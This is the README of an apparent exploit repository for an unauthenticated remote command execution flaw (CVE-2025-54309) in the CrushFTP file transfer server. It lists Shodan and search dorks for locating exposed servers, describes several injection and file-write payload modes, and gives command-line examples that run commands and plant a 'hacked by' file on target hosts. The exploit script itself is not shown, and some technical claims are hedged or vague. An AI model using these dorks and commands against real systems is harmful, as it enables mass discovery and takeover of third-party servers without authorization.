CrushFTP Unauthenticated Remote Command Execution Exploit# 💥 CVE-2025-54309 - CrushFTP Unauthenticated Remote Command Execution Exploit
> **PoC by Issam Junior**
> [](https://github.com/issamjr)
> [](https://x.com/issam_juniorx)
> [](https://t.me/issamiso)
---
## 🚨 Vulnerability Overview
- **CVE:** CVE-2025-54309
- **CVSS:** 9.8 (Critical)
- **Product:** CrushFTP
- **Impact:** Unauthenticated Remote Command Execution (RCE) over HTTPS
CrushFTP, a popular enterprise file transfer solution, suffers from a critical vulnerability in its DMZ proxy implementation. Missing checks allow external attackers to reach the admin interface via HTTPS POST requests, bypassing authentication and directly invoking system commands.
### Technical Breakdown
The vulnerability exists due to an incomplete validation in the DMZ proxy's handling of HTTPS requests. By crafting a malicious XML-RPC request to the `/WebInterface/function/` endpoint, attackers can trigger system commands on the server **without authentication**. This flaw allows full server compromise, data theft, and lateral movement.
**Affected Versions:**
> All CrushFTP versions prior to 10.7.0 (verify with vendor advisories for specifics).
---
## 🕵️♂️ Dorks for Hunting CrushFTP Servers
### 🔎 Shodan Dorks
```
http.favicon.hash:427298725 "CrushFTP"
http.html:"CrushFTP"
product:"CrushFTP"
ssl:"CrushFTP"
port:443 "CrushFTP"
```
### 🦊 Ffuf/Faff Dorks (URL Discovery)
```
/WebInterface/function/
/WebInterface/login/
/WebInterface/json/
/WebInterface/info/
/favicon.ico
```
### 🕷️ Hunter Dorks (Google, Censys, etc.)
```
title:"CrushFTP WebInterface"
"Powered by CrushFTP"
inurl:/WebInterface/function/
inurl:/WebInterface/login/
```
---
## ⚡ Exploit Features
- **Multiple Payloads:**
- **xml**: XML-RPC command injection (default, most reliable).
- **cmd_inject**: Classic command injection via POST parameters.
- **json**: JSON-based RCE simulation (if endpoint supports).
- **file_upload**: Simulated arbitrary file write (upload).
- **Recon Mode:**
- Fingerprints CrushFTP version.
- Scans for interesting endpoints and methods.
- **Output Parsing:**
- Extracts and highlights command output from responses.
---
## ⚡ Exploit Usage
### 1. Install Dependencies
```bash
pip install -r requirements.txt
```
### 2. Run the Exploit
```bash
python3 exploit.py <target> [-c <cmd>] [-p <payload>] [--recon]
```
- `<target>`: IP or domain of the vulnerable CrushFTP server.
- `-c <cmd>`: (Optional) Command to execute. Defaults to `id`.
- `-p <payload>`: (Optional) Payload type. Options: `xml`, `cmd_inject`, `json`, `file_upload` (default: `xml`).
- `--upload-file <filename>` and `--upload-data <data>`: Used with `file_upload` payload type.
- `--recon`: Run endpoint scan & version fingerprint.
**Examples:**
- XML-RPC RCE (default):
```bash
python3 exploit.py 192.168.1.100 -c "uname -a"
```
- Command Injection via login:
```bash
python3 exploit.py 192.168.1.100 -c "whoami" -p cmd_inject
```
- File Upload (simulated):
```bash
python3 exploit.py 192.168.1.100 -p file_upload --upload-file "/tmp/pwned.txt" --upload-data "CrushFTP hacked by Issam Junior"
```
- Reconnaissance:
```bash
python3 exploit.py 192.168.1.100 --recon
```
---
### 3. Output
- **Green**: Successful exploitation and command output.
- **Red**: Errors (network issues, non-vulnerable target).
- **Yellow**: Warnings (unexpected response).
---
## ⚠️ Disclaimer
> **This PoC is for educational purposes only.
> Do not use on systems without authorization.
> You are solely responsible for your actions.**
---
## 👤 Author & Socials
- **Name:** Issam Junior
[](https://github.com/issamjr)
[](https://x.com/issam_juniorx)
[](https://t.me/issamiso)
[4.0K] /data/pocs/f358f181106c71a16419bd858a72166aca2eeabc
├── [8.4K] exploit.py
├── [1.0K] LICENSE
├── [4.2K] README.md
└── [ 19] requirements.txt
0 directories, 4 files